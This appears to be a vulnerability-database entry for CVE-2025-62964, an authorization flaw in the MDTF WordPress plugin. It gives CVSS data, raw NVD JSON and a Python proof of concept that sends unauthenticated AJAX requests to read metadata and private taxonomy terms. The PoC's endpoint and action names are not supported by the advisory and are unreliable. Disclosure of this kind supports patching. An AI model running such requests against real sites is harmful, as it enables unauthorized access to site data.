Security Vulnerability Report
中文
CVE-2025-62964 CVSS 5.3 MEDIUM

CVE-2025-62964

Published: 2025-10-27 02:15:57
Last Modified: 2026-04-27 17:16:38

Description

Missing Authorization vulnerability in RealMag777 MDTF wp-meta-data-filter-and-taxonomy-filter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MDTF: from n/a through <= 1.3.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

MDTF插件所有版本 <= 1.3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62964 PoC - Missing Authorization in MDTF WordPress Plugin # Target: WordPress site with MDTF plugin <= 1.3.6 target = "http://target-wordpress-site.com" # PoC 1: Unauthorized metadata access via MDTF AJAX endpoint def test_unauthorized_meta_access(): """Test for missing authorization in MDTF metadata filter""" endpoints = [ f"{target}/wp-admin/admin-ajax.php", f"{target}/wp-json/mdtf/v1/filter" ] # Malicious payload to bypass access control payload = { 'action': 'mdtf_filter_action', 'post_types[]': 'post', 'meta_query': '{"key":"sensitive_data","compare":"EXISTS"}', 'nonce': '' # No nonce required due to missing authorization } for endpoint in endpoints: try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print(f"[!] Potential vulnerability at {endpoint}") print(f"Response: {response.text[:500]}") except requests.RequestException as e: print(f"Error testing {endpoint}: {e}") # PoC 2: Unauthorized taxonomy access def test_unauthorized_taxonomy_access(): """Test for missing authorization in taxonomy filter""" endpoint = f"{target}/wp-admin/admin-ajax.php" payload = { 'action': 'mdtf_taxonomy_filter', 'taxonomy': 'private_category', 'include_children': 'true' } try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200 and 'terms' in response.text: print(f"[!] Unauthorized taxonomy access possible!") except requests.RequestException as e: print(f"Error: {e}") if __name__ == "__main__": print("CVE-2025-62964 PoC - Testing MDTF plugin authorization bypass") test_unauthorized_meta_access() test_unauthorized_taxonomy_access()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62964", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:56.680", "lastModified": "2026-04-27T17:16:38.317", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in RealMag777 MDTF wp-meta-data-filter-and-taxonomy-filter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MDTF: from n/a through <= 1.3.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-meta-data-filter-and-taxonomy-filter/vulnerability/wordpress-mdtf-plugin-1-3-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}